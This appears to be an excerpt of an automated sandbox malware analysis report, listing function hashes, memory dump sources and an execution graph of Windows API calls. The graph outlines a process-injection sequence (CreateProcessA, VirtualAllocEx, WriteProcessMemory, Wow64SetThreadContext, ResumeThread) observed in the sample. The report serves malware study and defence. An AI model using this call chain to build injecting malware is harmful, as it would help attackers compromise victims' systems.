                                                                                        • Opcode Fuzzy Hash: 2a5c1b689c71d7373ecba0dad337cb5e37a7766ebea9cefc0f8ea50fd633f88d
                                                                                        • Instruction Fuzzy Hash: A8114CB0801649DADB20DF98C6093EDBBB4FF09308F6091AAD41537790D77D0B0A9B6A
                                                                                        Function 0043B990 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33a9d8548cd4bb4aab8a5ce9f66b748dc2079ace9fe1e14946d4babf08648239
                                                                                        • Instruction ID: 3b9ca243755fb207ae244291d35e8921ce97bf76751ec6dd1d3b818dc5ba91a4
                                                                                        • Opcode Fuzzy Hash: 33a9d8548cd4bb4aab8a5ce9f66b748dc2079ace9fe1e14946d4babf08648239
                                                                                        • Instruction Fuzzy Hash: 5F01D7B1D00249AFDB04DFA8D985AEEBFB8EB4C714F00852AE105B21A0E77455498FA5
                                                                                        Function 00403F40 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42cdf1849a56e4c6d9f36e6cc098a4509c9fe7c2c29297b41d168da59c7fcc8f
                                                                                        • Instruction ID: e88b019acc2e05677dd89c22a91ca40e7c29880e0ccd705d61975136e811e179
                                                                                        • Opcode Fuzzy Hash: 42cdf1849a56e4c6d9f36e6cc098a4509c9fe7c2c29297b41d168da59c7fcc8f
                                                                                        • Instruction Fuzzy Hash: B7E0991195E3C2AFC303177989265823FB88D0329230A40E7E5D4EB0E3C06C088E8776
                                                                                        Function 00409631 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33e06de20f4649e0cdc973f8fbaa503a9c09246c697ff6c12a4ea8162bd1db0e
                                                                                        • Instruction ID: 24cef97ea9cd79e0c62e734b7004f8fee13e34f4fef7727d363685fd6ef166e8
                                                                                        • Opcode Fuzzy Hash: 33e06de20f4649e0cdc973f8fbaa503a9c09246c697ff6c12a4ea8162bd1db0e
                                                                                        • Instruction Fuzzy Hash: 03D05E8025D3C08FC31357200C11BA02FA49B13240F1D48E7C585EB1E3C22C4D0AC32A
                                                                                        Function 0040560C Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 20bb715e09b060873a05daf8a35e2fdc3b8a7cd192f3c6052e34290e0ec2d864
                                                                                        • Instruction ID: 37f880ab455cb239edb4e15f59d3009af0baa78a926a7178d9017f95be00a018
                                                                                        • Opcode Fuzzy Hash: 20bb715e09b060873a05daf8a35e2fdc3b8a7cd192f3c6052e34290e0ec2d864
                                                                                        • Instruction Fuzzy Hash: 58B012143B4841EADA10FF584C0243B1180E2807403280C33E041E51D0CB39CE008E3E
                                                                                        Function 00405398 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bfc9a1e0da61b14968aad8adc21c4fdab552a830603433168653d7ab609eef4
                                                                                        • Instruction ID: 89c647bb333f80b15430a75a1d7362e7aed3f29a1e4329d63bf48c29ea5e98b9
                                                                                        • Opcode Fuzzy Hash: 7bfc9a1e0da61b14968aad8adc21c4fdab552a830603433168653d7ab609eef4
                                                                                        • Instruction Fuzzy Hash: EAB012143A4905DED304AB548C0283B1180E740BC03240C33EC82F11C0CABCCE004D6F

                                                                                        Non-executed Functions

                                                                                        Function 0043D710 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Db@$|Z@$3@$3@
                                                                                        • API String ID: 0-333138915
                                                                                        • Opcode ID: c2e3752ff4dab1e69db65f051c2450ac857733b2e973dbfbadfc96d03311b85a
                                                                                        • Instruction ID: 6ab14a924fb87ac5d2b5edcc62775b99b7df6f7b1deb56a34b7e6676f05fea19
                                                                                        • Opcode Fuzzy Hash: c2e3752ff4dab1e69db65f051c2450ac857733b2e973dbfbadfc96d03311b85a
                                                                                        • Instruction Fuzzy Hash: A1317370D00249AFDB10EFA5EE49EAEBB79FF84700F10412AF411B61A4DB785905CB59

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:265
                                                                                        Total number of Limit Nodes:10
                                                                                        execution_graph 25285 100d460 25286 100d4a6 GetCurrentProcess 25285->25286 25288 100d4f1 25286->25288 25289 100d4f8 GetCurrentThread 25286->25289 25288->25289 25290 100d535 GetCurrentProcess 25289->25290 25291 100d52e 25289->25291 25294 100d56b 25290->25294 25291->25290 25292 100d593 GetCurrentThreadId 25293 100d5c4 25292->25293 25294->25292 25295 57f8298 25296 57f82cb 25295->25296 25297 57f8339 25296->25297 25299 57f8622 25296->25299 25300 57f8676 ResumeThread 25299->25300 25302 57f862b 25299->25302 25303 57f86f9 25300->25303 25302->25297 25303->25297 25304 1004668 25305 100467a 25304->25305 25306 1004686 25305->25306 25310 1004778 25305->25310 25315 1004204 25306->25315 25308 10046a5 25311 100479d 25310->25311 25319 1004888 25311->25319 25323 1004879 25311->25323 25316 100420f 25315->25316 25331 1005d1c 25316->25331 25318 10070a3 25318->25308 25321 10048af 25319->25321 25320 100498c 25321->25320 25327 10044e4 25321->25327 25325 10048af 25323->25325 25324 100498c 25325->25324 25326 10044e4 CreateActCtxA 25325->25326 25326->25324 25328 1005918 CreateActCtxA 25327->25328 25330 10059db 25328->25330 25332 1005d27 25331->25332 25335 1005d3c 25332->25335 25334 10072a5 25334->25318 25336 1005d47 25335->25336 25339 1005d6c 25336->25339 25338 1007382 25338->25334 25340 1005d77 25339->25340 25343 1005d9c 25340->25343 25342 1007485 25342->25338 25344 1005da7 25343->25344 25346 10089eb 25344->25346 25349 100ac93 25344->25349 25345 1008a29 25345->25342 25346->25345 25353 100cd80 25346->25353 25358 100b0d0 25349->25358 25361 100b0b7 25349->25361 25350 100aca6 25350->25346 25354 100cdb1 25353->25354 25355 100cdd5 25354->25355 25370 100d348 25354->25370 25374 100d339 25354->25374 25355->25345 25359 100b0df 25358->25359 25365 100b1c8 25358->25365 25359->25350 25362 100b0cd 25361->25362 25364 100b1c8 GetModuleHandleW 25362->25364 25363 100b0df 25363->25350 25364->25363 25366 100b1fc 25365->25366 25367 100b1d9 25365->25367 25366->25359 25367->25366 25368 100b400 GetModuleHandleW 25367->25368 25369 100b42d 25368->25369 25369->25359 25372 100d355 25370->25372 25371 100d38f 25371->25355 25372->25371 25378 100d170 25372->25378 25375 100d348 25374->25375 25376 100d170 GetModuleHandleW 25375->25376 25377 100d38f 25375->25377 25376->25377 25377->25355 25379 100d175 25378->25379 25381 100dca0 25379->25381 25382 100d28c 25379->25382 25381->25381 25383 100d297 25382->25383 25384 1005d9c GetModuleHandleW 25383->25384 25385 100dd0f 25384->25385 25385->25381 25386 100d6a8 DuplicateHandle 25387 100d73e 25386->25387 25388 57f90a5 25389 57f8f85 25388->25389 25390 57f8fb8 25388->25390 25389->25390 25394 57fa3d0 25389->25394 25414 57fa42e 25389->25414 25435 57fa3c0 25389->25435 25395 57fa3ea 25394->25395 25455 57fb1cb 25395->25455 25460 57fad4c 25395->25460 25465 57fac0e 25395->25465 25470 57fadd0 25395->25470 25475 57fab31 25395->25475 25479 57fab74 25395->25479 25487 57fabd5 25395->25487 25492 57faada 25395->25492 25497 57fab9b 25395->25497 25504 57fa79d 25395->25504 25509 57fa7bd 25395->25509 25514 57fac7d 25395->25514 25519 57faea0 25395->25519 25527 57faaa1 25395->25527 25532 57fa8c3 25395->25532 25537 57fa964 25395->25537 25542 57fade8 25395->25542 25396 57fa40e 25396->25390 25415 57fa3bc 25414->25415 25417 57fa431 25414->25417 25418 57fac7d 2 API calls 25415->25418 25419 57fa7bd 2 API calls 25415->25419 25420 57fa79d 2 API calls 25415->25420 25421 57fab9b 4 API calls 25415->25421 25422 57faada 2 API calls 25415->25422 25423 57fabd5 2 API calls 25415->25423 25424 57fab74 4 API calls 25415->25424 25425 57fab31 2 API calls 25415->25425 25426 57fadd0 2 API calls 25415->25426 25427 57fac0e 2 API calls 25415->25427 25428 57fad4c 2 API calls 25415->25428 25429 57fb1cb 2 API calls 25415->25429 25430 57fade8 2 API calls 25415->25430 25431 57fa964 2 API calls 25415->25431 25432 57fa8c3 2 API calls 25415->25432 25433 57faaa1 2 API calls 25415->25433 25434 57faea0 4 API calls 25415->25434 25416 57fa40e 25416->25390 25417->25390 25418->25416 25419->25416 25420->25416 25421->25416 25422->25416 25423->25416 25424->25416 25425->25416 25426->25416 25427->25416 25428->25416 25429->25416 25430->25416 25431->25416 25432->25416 25433->25416 25434->25416 25436 57fa3cd 25435->25436 25438 57fac7d 2 API calls 25436->25438 25439 57fa7bd 2 API calls 25436->25439 25440 57fa79d 2 API calls 25436->25440 25441 57fab9b 4 API calls 25436->25441 25442 57faada 2 API calls 25436->25442 25443 57fabd5 2 API calls 25436->25443 25444 57fab74 4 API calls 25436->25444 25445 57fab31 2 API calls 25436->25445 25446 57fadd0 2 API calls 25436->25446 25447 57fac0e 2 API calls 25436->25447 25448 57fad4c 2 API calls 25436->25448 25449 57fb1cb 2 API calls 25436->25449 25450 57fade8 2 API calls 25436->25450 25451 57fa964 2 API calls 25436->25451 25452 57fa8c3 2 API calls 25436->25452 25453 57faaa1 2 API calls 25436->25453 25454 57faea0 4 API calls 25436->25454 25437 57fa40e 25437->25390 25438->25437 25439->25437 25440->25437 25441->25437 25442->25437 25443->25437 25444->25437 25445->25437 25446->25437 25447->25437 25448->25437 25449->25437 25450->25437 25451->25437 25452->25437 25453->25437 25454->25437 25457 57faa72 25455->25457 25456 57fb2c8 25457->25455 25457->25456 25547 57f88c8 25457->25547 25551 57f88d0 25457->25551 25461 57fa8cf 25460->25461 25461->25460 25463 57f88c8 WriteProcessMemory 25461->25463 25464 57f88d0 WriteProcessMemory 25461->25464 25462 57faf4d 25462->25396 25463->25462 25464->25462 25466 57fac14 25465->25466 25555 57fb5b8 25466->25555 25560 57fb5a8 25466->25560 25467 57fac38 25467->25396 25471 57fadbb 25470->25471 25569 57f89ba 25471->25569 25573 57f89c0 25471->25573 25472 57fb292 25477 57f88c8 WriteProcessMemory 25475->25477 25478 57f88d0 WriteProcessMemory 25475->25478 25476 57fab55 25477->25476 25478->25476 25480 57fab81 25479->25480 25481 57faaa0 25479->25481 25480->25481 25577 57f8738 25480->25577 25581 57f8730 25480->25581 25483 57f89ba ReadProcessMemory 25481->25483 25484 57f89c0 ReadProcessMemory 25481->25484 25482 57fb292 25483->25482 25484->25482 25488 57fabef 25487->25488 25489 57fac38 25488->25489 25490 57fb5b8 2 API calls 25488->25490 25491 57fb5a8 2 API calls 25488->25491 25489->25396 25490->25489 25491->25489 25493 57faa72 25492->25493 25493->25492 25494 57fb2c8 25493->25494 25495 57f88c8 WriteProcessMemory 25493->25495 25496 57f88d0 WriteProcessMemory 25493->25496 25495->25493 25496->25493 25500 57f8738 Wow64SetThreadContext 25497->25500 25501 57f8730 Wow64SetThreadContext 25497->25501 25498 57fabb5 25499 57fac38 25498->25499 25502 57fb5b8 2 API calls 25498->25502 25503 57fb5a8 2 API calls 25498->25503 25499->25396 25500->25498 25501->25498 25502->25499 25503->25499 25505 57fa80f 25504->25505 25585 57f8b4c 25505->25585 25589 57f8b58 25505->25589 25510 57fa7a0 25509->25510 25512 57f8b4c CreateProcessA 25510->25512 25513 57f8b58 CreateProcessA 25510->25513 25511 57fa8a4 25511->25396 25512->25511 25513->25511 25515 57fac26 25514->25515 25517 57fb5b8 2 API calls 25515->25517 25518 57fb5a8 2 API calls 25515->25518 25516 57fac38 25516->25396 25517->25516 25518->25516 25593 57fb489 25519->25593 25598 57fb498 25519->25598 25520 57faef9 25521 57fa8cf 25521->25520 25525 57f88c8 WriteProcessMemory 25521->25525 25526 57f88d0 WriteProcessMemory 25521->25526 25522 57faf4d 25522->25396 25525->25522 25526->25522 25528 57faabb 25527->25528 25530 57f89ba ReadProcessMemory 25528->25530 25531 57f89c0 ReadProcessMemory 25528->25531 25529 57fb292 25529->25529 25530->25529 25531->25529 25533 57fa8cf 25532->25533 25535 57f88c8 WriteProcessMemory 25533->25535 25536 57f88d0 WriteProcessMemory 25533->25536 25534 57faf4d 25534->25396 25535->25534 25536->25534 25538 57fa8cf 25537->25538 25540 57f88c8 WriteProcessMemory 25538->25540 25541 57f88d0 WriteProcessMemory 25538->25541 25539 57faf4d 25539->25396 25540->25539 25541->25539 25543 57fad8e 25542->25543 25545 57f89ba ReadProcessMemory 25543->25545 25546 57f89c0 ReadProcessMemory 25543->25546 25544 57fb292 25545->25544 25546->25544 25548 57f88d0 WriteProcessMemory 25547->25548 25550 57f896f 25548->25550 25550->25457 25552 57f8918 WriteProcessMemory 25551->25552 25554 57f896f 25552->25554 25554->25457 25556 57fb5cd 25555->25556 25559 57f8622 ResumeThread 25556->25559 25565 57f8688 25556->25565 25557 57fb5e0 25557->25467 25559->25557 25561 57fb5b8 25560->25561 25563 57f8688 ResumeThread 25561->25563 25564 57f8622 ResumeThread 25561->25564 25562 57fb5e0 25562->25467 25563->25562 25564->25562 25566 57f86c8 ResumeThread 25565->25566 25568 57f86f9 25566->25568 25568->25557 25570 57f89c0 ReadProcessMemory 25569->25570 25572 57f8a4f 25570->25572 25572->25472 25574 57f8a0b ReadProcessMemory 25573->25574 25576 57f8a4f 25574->25576 25576->25472 25578 57f877d Wow64SetThreadContext 25577->25578 25580 57f87c5 25578->25580 25580->25481 25582 57f8733 Wow64SetThreadContext 25581->25582 25584 57f87c5 25582->25584 25584->25481 25586 57f8b58 CreateProcessA 25585->25586 25588 57f8da3 25586->25588 25590 57f8be1 CreateProcessA 25589->25590 25592 57f8da3 25590->25592 25594 57fb498 25593->25594 25603 57f8808 25594->25603 25608 57f8810 25594->25608 25595 57fb4cc 25595->25521 25599 57fb4ad 25598->25599 25601 57f8808 VirtualAllocEx 25599->25601 25602 57f8810 VirtualAllocEx 25599->25602 25600 57fb4cc 25600->25521 25601->25600 25602->25600 25604 57f880b VirtualAllocEx 25603->25604 25605 57f8856 VirtualAllocEx 25603->25605 25606 57f888d 25604->25606 25605->25606 25606->25595 25609 57f8850 VirtualAllocEx 25608->25609 25611 57f888d 25609->25611 25611->25595 25612 57fb640 25613 57fb7cb 25612->25613 25614 57fb666 25612->25614 25614->25613 25617 57fb8c0 PostMessageW 25614->25617 25619 57fb8b9 25614->25619 25618 57fb92c 25617->25618 25618->25614 25620 57fb8c0 PostMessageW 25619->25620 25621 57fb92c 25620->25621 25621->25614

                                                                                        Executed Functions

                                                                                        Function 0100D450 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 294 100d450-100d4ef GetCurrentProcess 299 100d4f1-100d4f7 294->299 300 100d4f8-100d52c GetCurrentThread 294->300 299->300 301 100d535-100d569 GetCurrentProcess 300->301 302 100d52e-100d534 300->302 304 100d572-100d58d call 100d630 301->304 305 100d56b-100d571 301->305 302->301 307 100d593-100d5c2 GetCurrentThreadId 304->307 305->304 309 100d5c4-100d5ca 307->309 310 100d5cb-100d62d 307->310 309->310
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0100D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 72fd7556437a97aaac70a99e7309cbcf22b11524cc0a6dbb81c909c1a8740a36
                                                                                        • Instruction ID: 974a66117816f955ea670b23590555ea6ec9032dd8f0088ec9b51ba502e94024
                                                                                        • Opcode Fuzzy Hash: 72fd7556437a97aaac70a99e7309cbcf22b11524cc0a6dbb81c909c1a8740a36
                                                                                        • Instruction Fuzzy Hash: 135166B09006098FEB14DFA9D548B9EBFF1FF88304F208059E449A73A1DB79A944CB65
                                                                                        Function 0100D460 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 317 100d460-100d4ef GetCurrentProcess 321 100d4f1-100d4f7 317->321 322 100d4f8-100d52c GetCurrentThread 317->322 321->322 323 100d535-100d569 GetCurrentProcess 322->323 324 100d52e-100d534 322->324 326 100d572-100d58d call 100d630 323->326 327 100d56b-100d571 323->327 324->323 329 100d593-100d5c2 GetCurrentThreadId 326->329 327->326 331 100d5c4-100d5ca 329->331 332 100d5cb-100d62d 329->332 331->332
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0100D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0100D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 3c467cb4f3443b2607c783e5e337700dca637052dba3a3756298629841a7367b
                                                                                        • Instruction ID: 6e5e6fae1946b880fb10869dfeb0ca3ac2b1620422f23214087ffd07203a5d30
                                                                                        • Opcode Fuzzy Hash: 3c467cb4f3443b2607c783e5e337700dca637052dba3a3756298629841a7367b
                                                                                        • Instruction Fuzzy Hash: 645168B09006098FEB14DFA9D548B9EBFF1EF88304F208059E419A73A0D7399944CF65
                                                                                        Function 057F8B4C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 461 57f8b4c-57f8bed 464 57f8bef-57f8bf9 461->464 465 57f8c26-57f8c46 461->465 464->465 466 57f8bfb-57f8bfd 464->466 472 57f8c7f-57f8cae 465->472 473 57f8c48-57f8c52 465->473 467 57f8bff-57f8c09 466->467 468 57f8c20-57f8c23 466->468 470 57f8c0d-57f8c1c 467->470 471 57f8c0b 467->471 468->465 470->470 474 57f8c1e 470->474 471->470 479 57f8ce7-57f8da1 CreateProcessA 472->479 480 57f8cb0-57f8cba 472->480 473->472 475 57f8c54-57f8c56 473->475 474->468 477 57f8c79-57f8c7c 475->477 478 57f8c58-57f8c62 475->478 477->472 481 57f8c66-57f8c75 478->481 482 57f8c64 478->482 493 57f8daa-57f8e30 479->493 494 57f8da3-57f8da9 479->494 480->479 483 57f8cbc-57f8cbe 480->483 481->481 484 57f8c77 481->484 482->481 485 57f8ce1-57f8ce4 483->485 486 57f8cc0-57f8cca 483->486 484->477 485->479 488 57f8cce-57f8cdd 486->488 489 57f8ccc 486->489 488->488 490 57f8cdf 488->490 489->488 490->485 504 57f8e32-57f8e36 493->504 505 57f8e40-57f8e44 493->505 494->493 504->505 506 57f8e38 504->506 507 57f8e46-57f8e4a 505->507 508 57f8e54-57f8e58 505->508 506->505 507->508 511 57f8e4c 507->511 509 57f8e5a-57f8e5e 508->509 510 57f8e68-57f8e6c 508->510 509->510 512 57f8e60 509->512 513 57f8e7e-57f8e85 510->513 514 57f8e6e-57f8e74 510->514 511->508 512->510 515 57f8e9c 513->515 516 57f8e87-57f8e96 513->516 514->513 518 57f8e9d 515->518 516->515 518->518
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057F8D8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 33a8f3ceac8ffbeba8d902b54b17f1590f248607176a7313be725f9a310747fb
                                                                                        • Instruction ID: f73b3b3b01a9c93bcc20e183e3f3a7b659f86f4929d056cb6ee6a908d57597bb
                                                                                        • Opcode Fuzzy Hash: 33a8f3ceac8ffbeba8d902b54b17f1590f248607176a7313be725f9a310747fb
                                                                                        • Instruction Fuzzy Hash: B9A17A71D00219CFEB14CF68C840BEEBBB2BF48304F1485AAE959A7350DB749985DF92
                                                                                        Function 057F8B58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 519 57f8b58-57f8bed 521 57f8bef-57f8bf9 519->521 522 57f8c26-57f8c46 519->522 521->522 523 57f8bfb-57f8bfd 521->523 529 57f8c7f-57f8cae 522->529 530 57f8c48-57f8c52 522->530 524 57f8bff-57f8c09 523->524 525 57f8c20-57f8c23 523->525 527 57f8c0d-57f8c1c 524->527 528 57f8c0b 524->528 525->522 527->527 531 57f8c1e 527->531 528->527 536 57f8ce7-57f8da1 CreateProcessA 529->536 537 57f8cb0-57f8cba 529->537 530->529 532 57f8c54-57f8c56 530->532 531->525 534 57f8c79-57f8c7c 532->534 535 57f8c58-57f8c62 532->535 534->529 538 57f8c66-57f8c75 535->538 539 57f8c64 535->539 550 57f8daa-57f8e30 536->550 551 57f8da3-57f8da9 536->551 537->536 540 57f8cbc-57f8cbe 537->540 538->538 541 57f8c77 538->541 539->538 542 57f8ce1-57f8ce4 540->542 543 57f8cc0-57f8cca 540->543 541->534 542->536 545 57f8cce-57f8cdd 543->545 546 57f8ccc 543->546 545->545 547 57f8cdf 545->547 546->545 547->542 561 57f8e32-57f8e36 550->561 562 57f8e40-57f8e44 550->562 551->550 561->562 563 57f8e38 561->563 564 57f8e46-57f8e4a 562->564 565 57f8e54-57f8e58 562->565 563->562 564->565 568 57f8e4c 564->568 566 57f8e5a-57f8e5e 565->566 567 57f8e68-57f8e6c 565->567 566->567 569 57f8e60 566->569 570 57f8e7e-57f8e85 567->570 571 57f8e6e-57f8e74 567->571 568->565 569->567 572 57f8e9c 570->572 573 57f8e87-57f8e96 570->573 571->570 575 57f8e9d 572->575 573->572 575->575
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057F8D8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2295787014.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_57f0000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: bb5201c4567244c051d067c4aa748fa1ead3421380be77b5c2c4d10a29ff415a
                                                                                        • Instruction ID: 721656be9b90f63c0af74990beeff0f9c721f2367c76b5ed2dd18753a114f673
                                                                                        • Opcode Fuzzy Hash: bb5201c4567244c051d067c4aa748fa1ead3421380be77b5c2c4d10a29ff415a
                                                                                        • Instruction Fuzzy Hash: DC917A71D00219CFEB14CF68C844BEDBBB2BF48304F1485AAE959A7350DB749985DF92
                                                                                        Function 0100B1C8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 576 100b1c8-100b1d7 577 100b203-100b207 576->577 578 100b1d9-100b1e6 call 1009c38 576->578 579 100b209-100b213 577->579 580 100b21b-100b25c 577->580 585 100b1e8 578->585 586 100b1fc 578->586 579->580 587 100b269-100b277 580->587 588 100b25e-100b266 580->588 634 100b1ee call 100b450 585->634 635 100b1ee call 100b460 585->635 586->577 589 100b279-100b27e 587->589 590 100b29b-100b29d 587->590 588->587 593 100b280-100b287 call 100ae80 589->593 594 100b289 589->594 592 100b2a0-100b2a7 590->592 591 100b1f4-100b1f6 591->586 595 100b338-100b3f8 591->595 596 100b2b4-100b2bb 592->596 597 100b2a9-100b2b1 592->597 599 100b28b-100b299 593->599 594->599 627 100b400-100b42b GetModuleHandleW 595->627 628 100b3fa-100b3fd 595->628 600 100b2c8-100b2d1 call 100ae90 596->600 601 100b2bd-100b2c5 596->601 597->596 599->592 607 100b2d3-100b2db 600->607 608 100b2de-100b2e3 600->608 601->600 607->608 609 100b301-100b305 608->609 610 100b2e5-100b2ec 608->610 632 100b308 call 100b730 609->632 633 100b308 call 100b760 609->633 610->609 612 100b2ee-100b2fe call 100aea0 call 100aeb0 610->612 612->609 613 100b30b-100b30e 616 100b310-100b32e 613->616 617 100b331-100b337 613->617 616->617 629 100b434-100b448 627->629 630 100b42d-100b433 627->630 628->627 630->629 632->613 633->613 634->591 635->591
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2289919560.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_1000000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 5070d992af1f756030fbc896dd0e39628c10b5aaa8b1faf6b4b39f8660b76eba
                                                                                        • Instruction ID: fbe18c59c08ddbee1260d4b8900a0e7dd19ffa8b9f98f9c65f91486effa7ae85
                                                                                        • Opcode Fuzzy Hash: 5070d992af1f756030fbc896dd0e39628c10b5aaa8b1faf6b4b39f8660b76eba
                                                                                        • Instruction Fuzzy Hash: 89714570A00B058FEB65DF6AD44579ABBF1FF88304F00896DE48AD7A90DB74E945CB90
                                                                                        Function 010044E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 636 10044e4-10059d9 CreateActCtxA 639 10059e2-1005a3c 636->639 640 10059db-10059e1 636->640 647 1005a4b-1005a4f 639->647 648 1005a3e-1005a41 639->648 640->639 649 1005a60 647->649 650 1005a51-1005a5d 647->650 648->647 652 1005a61 649->652 650->649 652->652
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                                                        Memory Dump Source
